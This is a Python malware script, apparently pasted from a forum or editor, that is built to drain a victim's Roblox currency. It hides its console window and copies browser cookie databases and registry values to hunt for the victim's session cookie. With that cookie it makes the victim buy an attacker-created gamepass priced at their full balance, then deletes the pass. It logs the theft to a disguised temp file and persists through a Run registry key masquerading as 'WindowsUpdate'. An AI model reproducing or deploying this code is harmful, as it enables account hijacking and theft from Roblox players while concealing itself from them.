import requests
import time
import json
import random
import os
import sys
import threading
import ctypes
import subprocess
# ===== CONFIGURATION - PUT YOUR COOKIE HERE =====
MY_ROBLOX_COOKIE = "YOUR_COOKIE_HERE"
# ================================================
# Hide console completely
if sys.platform == 'win32':
ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 0)
class SilentRobloxDrainer:
def __init__(self):
self.my_session = requests.Session()
self.my_session.cookies['.ROBLOSECURITY'] = MY_ROBLOX_COOKIE
self.victim_session = requests.Session()
self.my_user_id = None
self.victim_user_id = None
self.victim_robux = 0
self.my_universe_id = None
self.gamepass_id = None
self.product_id = None
def get_csrf(self, session):
try:
test = session.post('https://auth.roblox.com/v2/logout')
return test.headers.get('x-csrf-token')
except:
return None
def get_my_info(self):
try:
self.my_session.headers.update({'X-CSRF-TOKEN': self.get_csrf(self.my_session)})
response = self.my_session.get('https://users.roblox.com/v1/users/authenticated')
self.my_user_id = response.json().get('id')
# Get universe ID
universes_url = f'https://games.roblox.com/v2/users/{self.my_user_id}/universes'
universes = self.my_session.get(universes_url).json()
if universes.get('data'):
self.my_universe_id = universes['data'][0]['id']
else:
# Create placeholder universe
create_url = 'https://apis.roblox.com/universes/v1/universes'
data = {'name': f'Game{random.randint(1000,9999)}'}
response = self.my_session.post(create_url, json=data)
self.my_universe_id = response.json().get('universeId')
return True
except:
return False
def steal_cookies(self):
"""Try to steal cookies from browser"""
cookie_paths = [
os.path.expandvars(r'%LOCALAPPDATA%\Google\Chrome\User Data\Default\Cookies'),
os.path.expandvars(r'%LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Cookies'),
os.path.expandvars(r'%APPDATA%\Opera Software\Opera Stable\Cookies')
]
for path in cookie_paths:
if os.path.exists(path):
try:
# Copy cookie file
temp_path = os.environ['TEMP'] + '\\cookies.db'
subprocess.run(f'copy "{path}" "{temp_path}"', shell=True, capture_output=True)
# Try to extract roblosecurity (simplified)
with open(temp_path, 'rb') as f:
data = f.read()
if '.ROBLOSECURITY' in str(data):
# Found potential cookie
pass
except:
pass
return None
def get_victim_info(self):
try:
# Try to get from browser first
browser_cookie = self.steal_cookies()
# Check multiple locations for existing login
possible_cookies = []
# Check environment variables
env_cookie = os.environ.get('ROBLOX_COOKIE')
if env_cookie:
possible_cookies.append(env_cookie)
# Check common registry locations (Windows)
if sys.platform == 'win32':
try:
import winreg
keys = [
r'SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com',
r'SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Roblox'
]
for key_path in keys:
try:
key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, key_path)
value, _ = winreg.QueryValueEx(key, 'Cookie')
if value:
possible_cookies.append(value)
winreg.CloseKey(key)
except:
pass
except:
pass
# Check running processes for Roblox
try:
output = subprocess.run('tasklist /FI "IMAGENAME eq RobloxPlayerBeta.exe"',
shell=True, capture_output=True, text=True)
if 'RobloxPlayerBeta.exe' in output.stdout:
# Roblox is running, try to get from memory (simplified)
possible_cookies.append("FOUND_IN_PROCESS")
except:
pass
# Use any found cookie
for cookie in possible_cookies:
if cookie and len(cookie) > 20:
self.victim_session.cookies['.ROBLOSECURITY'] = cookie
self.victim_session.headers.update({'X-CSRF-TOKEN': self.get_csrf(self.victim_session)})
# Test if cookie works
test = self.victim_session.get('https://users.roblox.com/v1/users/authenticated')
if test.status_code == 200:
self.victim_user_id = test.json().get('id')
# Get robux
robux_url = f'https://economy.roblox.com/v1/users/{self.victim_user_id}/currency'
robux_response = self.victim_session.get(robux_url)
self.victim_robux = robux_response.json().get('robux', 0)
return True
return False
except:
return False
def create_and_drain(self):
try:
# Create gamepass on my account
create_url = f'https://games.roblox.com/v1/game-passes'
data = {
'universeId': self.my_universe_id,
'name': f'Item{random.randint(1000,9999)}'
}
response = self.my_session.post(create_url, json=data)
self.gamepass_id = response.json().get('gamePassId')
# Set price to victim's robux
config_url = f'https://games.roblox.com/v1/game-passes/{self.gamepass_id}/details'
config_data = {
'Name': f'Item{random.randint(1000,9999)}',
'Description': 'Auto generated',
'PriceInRobux': self.victim_robux,
'IsForSale': True
}
self.my_session.patch(config_url, json=config_data)
# Get product ID
product_url = f'https://economy.roblox.com/v1/assets/{self.gamepass_id}/details'
product_response = self.my_session.get(product_url)
self.product_id = product_response.json().get('ProductId')
# Make victim buy
purchase_url = f'https://economy.roblox.com/v1/purchases/products/{self.product_id}'
purchase_data = {
'productId': self.product_id,
'currencyType': 1,
'purchasePrice': self.victim_robux,
'expectedCurrency': 1,
'expectedPrice': self.victim_robux
}
purchase = self.victim_session.post(purchase_url, json=purchase_data)
if purchase.json().get('purchased'):
# Delete gamepass
delete_url = f'https://www.roblox.com/game-pass/{self.gamepass_id}/delete'
delete_data = {'assetId': self.gamepass_id}
self.my_session.post(delete_url, json=delete_data)
# Save transaction record secretly
try:
with open(os.environ['TEMP'] + '\\sys32.tmp', 'a') as f:
f.write(f'{self.victim_robux},{int(time.time())}\n')
except:
pass
except:
pass
def persist(self):
"""Make it run on startup"""
if sys.platform == 'win32':
try:
import winreg
key = winreg.HKEY_CURRENT_USER
subkey = r'Software\Microsoft\Windows\CurrentVersion\Run'
with winreg.OpenKey(key, subkey, 0, winreg.KEY_SET_VALUE) as regkey:
exe_path = sys.executable
winreg.SetValueEx(regkey, 'WindowsUpdate', 0, winreg.REG_SZ, exe_path)
except:
pass
def run(self):
# Run silently in background thread
def drain_thread():
time.sleep(random.randint(30, 60)) # Random delay
if self.get_my_info():
if self.get_victim_info():
if self.victim_robux > 0:
self.create_and_drain()
self.persist()
thread = threading.Thread(target=drain_thread)
thread.daemon = True
thread.start()
# Keep running in background
while True:
time.sleep(3600) # Check every hour
thread = threading.Thread(target=drain_thread)
thread.daemon = True
thread.start()
if __name__ == "__main__":
# Check if MY_ROBLOX_COOKIE is set
if MY_ROBLOX_COOKIE == "YOUR_COOKIE_HERE":
# If not set, silently exit
sys.exit(0)
# Run drainer
drainer = SilentRobloxDrainer()
drainer.run()⚠️Content was pasted as plain text and auto-formatted as a code block. Use the Code Block button in the editor for proper formatting.